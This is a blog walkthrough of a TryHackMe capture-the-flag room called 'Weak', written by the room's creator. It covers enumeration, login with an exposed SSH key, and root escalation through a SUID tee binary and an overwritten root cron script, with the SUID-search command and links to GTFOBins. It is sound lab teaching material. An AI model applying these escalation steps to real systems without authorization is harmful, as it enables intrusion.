Open in app

Sign in

Write

Sign in

Weak [TryHackMe] Walkthrough

Siddharth Johri
4 min readApr 1, 2023

--

I recently developed a THM Room for a CTF event at my college and here is the Walkthrough !!

Link: https://tryhackme.com/jr/weak

Note: The box does take upto 5–7 Minutes to properly start all services so you gotta be a little patient :)

Recon

A basic port scan of the box reveals that ports 80 and 22 are open with valid services(http and ssh respectively).

Enumeration

Http

A very basic looking template

The http page has no active buttons or anything, so source code analysis and directory busting is something I would do.

User: tyrone

This particular comment begs the possibility of tyrone being a valid user on the box.

Meanwhile, directory busting reveals the existence of a file called impressum.txt

Which so luckily looks like a private key for ssh login.

Putting two and two together, login can be achieved for tyrone.

yup chmod 600 atw
yay!

More Enumeration

After login, local.txt is immediately found in /home/tyrone/

Further the /var/www/html/ has a file called flag2 which we are not allowed to read

Looking at it closely, its owned by tyrone himself, so we can change the permissions and let us read it.

Don’t try to copy the flag pls

A casual grep on the file contents show us two more files which can be read once we change their permissions

4 flags down !

The Root directory has a text file which can be read by tyrone but is clearly not a flag

baseRot1364 looks like a base64 wrapper around rot13

Base64 — Rot13 — Base64

Lets get that flag down!

Privilege Escalation

The user tyrone has no sudo permissions and no as such credentials available in any directories.

Looking at the SUID bits with the following command lets us look at binaries which allow any user to execute them as the user that owns them

find / -perm -4000 2>/dev/null

/usr/bin/tee is an interesting binary with a notable GTFObins descriptions.

https://gtfobins.github.io/gtfobins/tee/#suid

Now we can overwrite any file in the file system. ( Easy Priv Esc through /etc/passwd)

However, there is another Privilege Escalation Vector which I would Like to display.

crontab is unreadable. Weird.

Lets Monitor Services to see what crontab is running .

https://github.com/DominicBreuker/pspy

Something, Somewhere is triggering a script. The UID is zero, so probably root.

Awesome, Lets overwrite this
Custom command to overwrite the script.sh
Now this should turn to an SUID bit as soon as the clock hits 00
Bash is now an SUID bit.

Root access now easily available via an easy GTFOBins command

https://gtfobins.github.io/gtfobins/bash/#suid

cd to root and grab the proof.txt ezpz.

Any comments, suggestion or critique can be communicated to me via Twitter, LinkedIn or dropping a comment here

@JodisKripe

Cybersecurity
Tryhackme
Hacking

--

--

Siddharth Johri

Written by Siddharth Johri

53 Followers

To hack the world, first you need to make coffee

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams